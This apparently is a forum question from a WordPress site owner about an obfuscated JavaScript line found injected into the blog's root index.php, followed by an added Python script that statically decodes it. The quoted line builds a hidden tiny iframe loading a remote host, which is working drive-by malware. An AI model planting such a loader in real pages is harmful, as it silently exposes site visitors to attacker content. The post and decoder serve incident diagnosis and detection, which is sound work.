In index.php I think this is normal,
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>
Right after that inside index.php, I recently found this:
<?php echo 'status=' ';nf='ifr';r='3';i='gi?';x='u';ei='r';b='//g';kh='.c';l='s';e='ame';t='/i';k='pt0';jl='h';ou=':';yv='.r';j='n';tl='c';tp='ttp';pa=nf.concat(e);nj=l.concat(ei,tl);h=jl.concat(tp,ou,b,k,yv,x,t,j,kh,i,r);var qb=document.createElement(pa);qb.setAttribute('width','5');qb.setAttribute('height','5');qb.setAttribute('style','display:none');qb.setAttribute(nj,h);document.body.appendChild(qb);'; ?>
What's that?
Background: I have a fairly new WP 2.7 blog. I'm the Administrator, and I have a couple Authors. The site was running live normally on Sunday. On Tuesday I looked and the site was down with a short error message that mentioned mysite.com/index.php (which I know is normally just the index.php in the main blog folder, it only loads the header, it's not my theme's template index.php). So I looked inside the index.php to see if it was normal, and it did not appear normal to me. I have not changed this file manually, ever, as far as I can remember it should be the default index.php that came with WP 2.6.x.
So when I found the above unknown-code I replaced index.php with a default index.php (the site immediately worked again). So I changed some of my passwords in case I was hacked: I changed my WP Admin password, and my Cpanel login password. I haven't changed MySQL database password and wp-config yet, should I do that too?
No other signs of hacking yet, I'm going to research it more now & first wanted the Forum's reading of what that code is.
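The injected line quoted in the post can be read without running it. The following is an added example, not part of the original post: a small static resolver that substitutes the single-quoted assignments and `concat()` calls copied from that line and reports the element the script would create. The function names are hypothetical, and the garbled `echo 'status=' '` prefix is left out.

```python
import re

# Assignments and calls copied from the injected line quoted in the post
# (the PHP echo wrapper and the 'status=' prefix are omitted).
SNIPPET = (
    "nf='ifr';r='3';i='gi?';x='u';ei='r';b='//g';kh='.c';l='s';e='ame';t='/i';"
    "k='pt0';jl='h';ou=':';yv='.r';j='n';tl='c';tp='ttp';"
    "pa=nf.concat(e);nj=l.concat(ei,tl);h=jl.concat(tp,ou,b,k,yv,x,t,j,kh,i,r);"
    "var qb=document.createElement(pa);qb.setAttribute('width','5');"
    "qb.setAttribute('height','5');qb.setAttribute('style','display:none');"
    "qb.setAttribute(nj,h);document.body.appendChild(qb);"
)

LITERAL = re.compile(r"(?:^|;)\s*(?:var\s+)?(\w+)='([^']*)'")
CONCAT = re.compile(r"(?:^|;)\s*(?:var\s+)?(\w+)=(\w+)\.concat\(([\w,\s]*)\)")
CREATE = re.compile(r"(\w+)=document\.createElement\((\w+|'[^']*')\)")
SETATTR = re.compile(r"(\w+)\.setAttribute\((\w+|'[^']*'),\s*(\w+|'[^']*')\)")

def resolve(token, env):
    """Return a quoted literal's text, or the value of a known variable."""
    token = token.strip()
    if token.startswith("'"):
        return token[1:-1]
    return env.get(token, "<unresolved:%s>" % token)

def deobfuscate(js):
    """Statically rebuild the element the script creates; nothing is executed."""
    env = {m.group(1): m.group(2) for m in LITERAL.finditer(js)}
    for m in CONCAT.finditer(js):  # concat() calls, in source order
        name, base, args = m.groups()
        parts = [base] + [a for a in args.split(",") if a.strip()]
        env[name] = "".join(resolve(p, env) for p in parts)
    created = CREATE.search(js)
    if not created:
        return None
    var, tag = created.groups()
    attrs = {resolve(k, env): resolve(v, env)
             for obj, k, v in SETATTR.findall(js) if obj == var}
    return {"tag": resolve(tag, env), "attrs": attrs}

def is_hidden_remote_frame(el):
    """True for an iframe that loads a remote URL but is styled invisible or tiny."""
    if not el or el["tag"].lower() != "iframe":
        return False
    a = el["attrs"]
    remote = re.match(r"(?:https?:)?//", a.get("src", "")) is not None
    hidden = "display:none" in a.get("style", "").replace(" ", "")
    tiny = all(a.get(d, "").isdigit() and int(a[d]) <= 5 for d in ("width", "height"))
    return remote and (hidden or tiny)
```

Calling `deobfuscate(SNIPPET)` returns the tag name and attribute map, and `is_hidden_remote_frame()` on that result flags the pattern to look for in other files on the same host.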